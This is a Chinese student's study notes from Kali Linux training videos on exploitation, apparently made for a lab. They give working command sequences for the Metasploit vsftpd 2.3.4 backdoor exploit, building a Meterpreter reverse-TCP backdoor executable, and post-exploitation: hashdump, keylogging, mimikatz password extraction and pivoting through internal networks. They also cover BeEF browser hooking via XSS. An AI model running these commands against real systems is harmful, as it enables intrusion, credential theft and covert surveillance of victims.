kali视频（26-30）学习

KaliSecurity 漏洞利用之检索与利用

searchsploit可以借助关键词搜索漏洞信息以及漏洞对应的exp【重要】

exploit-database在github上面有对应的地址

国内可以在“乌云”“cbug”上搜索相关的漏洞信息

searchsploit wordpress列出了漏洞和文件地址。

查看列出的文件，例：ikat自动化开启不同的exp，等待目标访问中招。

termineter可以评估智能电表的安全性

KaliSecurity 漏洞利用之Metasploit基础【非常重要】

Metasploit在渗透测试中经常被用到。这套软件包括了很多工具，这些工具组成了一个完整的攻击框架。

启动服务:

在Kali中使用Metasploit，需要先开启PostgreSQL数据库服务和metasploit服务，然后就可以利用msf数据库查询exploit和记录。

service postgresql startservice matasploit start//或者可以随着配置随着系统启动update-rc.d postgresql enable update-rc.d matasploit enable

路径介绍

Kali中msf的路径为/usr/share/metasploit-framework。

其中：

Auxiliary：辅助模块

encoders：供msfencode编码工具使用，具体可以使用 msfencode –l但显示命令不存在。

exploits：攻击模块 每个介绍msf的文章都会提到那个ms08_067_netapi，它就在这个目录下。

payloads：其中列出的是攻击载荷，也就是攻击成功后执行的代码。比如我们常设置的windows/meterpreter/reverse_tcp就在这个文件夹下。

post：后渗透阶段块，在获得meterpreter的shell之后可以使用攻击代码。比如常用的hashdump、arp_scanner就在这里。

基本命令

msfpayload:用来生成payload或者shellcode。

搜索时可以用msfpayload -l |gre[ "windows"这样的命令查询。-o选项可以列出payload所需的参数。

msfencode：msf中的编码器，早期用来绕过AV（杀毒软件），现常用msfpayload与它编码避免exploit的坏字符串。

msfconsole：开启metasploit的console。

输入msfconsole，打开msf。

测试示例：发现漏洞，搜索exploit，可以看到21端口开放的是ftp服务，用的版本是ftpd 5.0。

此版本是否存在漏洞，在msf里搜索一下，发现有匹配项，然后攻击之后成功。

nmap -sV 172.30.2.73//发现开启了一个vsftpd 21端口的一个2.3.4的一个服务maf> search vsftp//看看vsfpd是否有漏洞 发现正好有一个漏洞msf> use exploit/unix/ftp/vsptpd_234_backdoor//进入msf>show options//看到需要配置的参数msf>set rhost 192.168.11.225//选择要搞得远程地址msf>set payload cmd/unix/interact//之后还要配置payload，就是执行成功之后进行的代码exploit//进行对目标进行攻击成功之后就可以进行查看，比如：id  woami   cat/etc/passwd  cat /etc/shadow等等

KaliSecurity 漏洞利用之Meterpreter介绍【很重要】【成了之后控制靶机的东西】

生成Meterpreter后门

打开MSF，开启监听（选择exploit/multi/handler）。

msfpayload windows/meterpreter/reverse_tcp LHOST=172.30.2.73 LPORT=2333 R | msfencode -t exe -c 5 > /root/door1.exe

在指定目录，生成exe后门。

msf>use exploit/multi/handler //选择使用这个接受反弹连接msf>show options//显示所有东西 msf>set payload windows/meterpreter/reverse_tcpset Lport 2333set Lhost 172.16.215.182//监听本地的2333端口等待返回的payloadbackground//进行查看当前状态seddions -i 1 //回到msf中sysinfo//查看系统信息hashdump//获取hash等等screenshot//获取屏幕keyscan_start//记录键盘keyscan_dump//得到从记录开始的键盘状态keyscan_stop//就能关闭这款服务load+tab//得到扩展工具比如：mimikatz抓取明文，load之后加上help就能看到明文wdigest就能够获取密码明文

更新的kali，现在已经没有msfpayload的命令了，换成msfvenom了。里面集成了msfpayload和msfencode，然后将door植到对方主机

KaliSecurity 漏洞利用之Metasploit后渗透测试【使用Msf获得后门后，获得内网主机权限】

在跳板获取一定权限后，需要积极地向内网主机权限发展，获取指定的目标信息，探查系统漏洞，借助msf已经得到的Meterpreter后门，可以使

后续的操作更容易。

查看当前网卡、网段信息（使用ifconfig）。可查看到三个网卡，一个是本地网卡，另一个是我们能访问的网卡，还有一个网卡具有内网IP（访

问不到，可以ping以下试试）。

添加路由表

run autoroute -s 10.0.0.1

可以使用msf中的模块跨网段攻击或扫描。可通过脚本autoroute快速添加。

开socket代理，通过使用

search socks use auxiliary/server/socks4ashow options//查找现在的状态exploit//建立一个代理run//之后后续有两百多个命令run arp_scanner -h 10.0.0.1/24//扫描内网信息

模块，创建一个socks代理，可以为浏览器，sqlmap，nmap使用。通过代理即可访问内网计算机。

通过background和session -i可以自由切换进入session。

输入run可以看到在meterpreter上可以做的很多命令。

通过run post/可以看到后渗透测试模块。

获取内网信息

也可以上传文件，做端口转发后进行后续测试，例

upload lcx.exe c:\

传送文件到c盘根目录。

KaliSecurity 漏洞利用之BeEF【重要】

一个浏览器漏洞利用框架

在命令行下启动BeeF，beef-xss。

假设被测试主机由于XSS漏洞请求到http://127.0.0.1:3000/demos/basic.html，此时页面左侧就会多出一项在线主机：

hook持续的时间为关闭测试页面为止，在此期间，相当于被控制了，可以发送攻击命令，在commands模块，我们可以完成很多任务：

其中四种颜色分别表示：

该攻击模块可用，且隐蔽性强该攻击模块可用，但隐蔽性差该用户模块是否可用还有待验证该攻击模块不可用

选取misc下的raw javascript模块作为测试用例，右端表格有该模块的详细说明，以及一些可选的参数等。输入javascript code，点击excute进

行攻击。在此，输入的是hello world，返回成功！

Proxy功能（代理功能）

选中目标主机，点右键，在菜单中选中Use as Proxy；然后在Rider选项卡中的Forge Request编辑并发送想要发送的内容。

BeeF默认是不加载Metasploit的，如果要使用Metasploit丰富的攻击模块，需要做些配置。

首先打开beef xss目录：

cd /usr/share/beef-xss/lsnano config.yaml  /*编辑一下，可以看到有很多配置信息，包括用户名、密码都可以在这设置，在此将extension下的Metasploit的false修

改为true */

clear

保证此处IP等信息设置正确（不适用127.0.0.1，需使用本机IP），并修改Custom路径：

cd extensions/metasploit/lsnano config.yaml  /* 将host和callback_host行的IP修改为本机IP,并修改custom路径为/usr/share/metasploit-framework/ */

配置好后打开msfconsole，运行命令：

load msgrpc ServerHost=192.168.199.198 Pass=abc123cd /usr/share/beef-xss./beef -x//重新加载Metasploit的exploit模块。加载之后，重启下服务service beef-xss restart。

此时再访问以下之前的页面，发现无法连接，稍等片刻，使用默认用户密码登录进去。发现Metasploit下多了许多模块：